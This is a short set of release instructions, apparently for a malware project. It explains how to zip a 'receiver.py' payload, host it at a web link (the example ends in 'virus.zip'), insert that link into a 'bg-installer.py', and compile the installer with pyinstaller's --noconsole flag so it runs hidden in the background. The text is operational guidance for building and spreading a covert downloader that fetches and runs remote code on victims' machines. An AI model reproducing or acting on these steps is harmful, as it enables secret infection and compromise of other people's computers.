Once you are done building receiver.py and and have zipped receiver.py
and storage
, host these files somewhere on the web
ie https://thingwebsite.web.app/virus.zip
the link above is an example using firebase, not a real link tho
Then install the file attached to this release and edit the values:
url = ""
on line 41 to the link of the zip you hosted
After editing the values you can build it with using pyinstaller:
pyinstaller --noconfirm --onefile --noconsole "path_to_bg-installer.py"
--noconsole
attribute makes the installer run in the background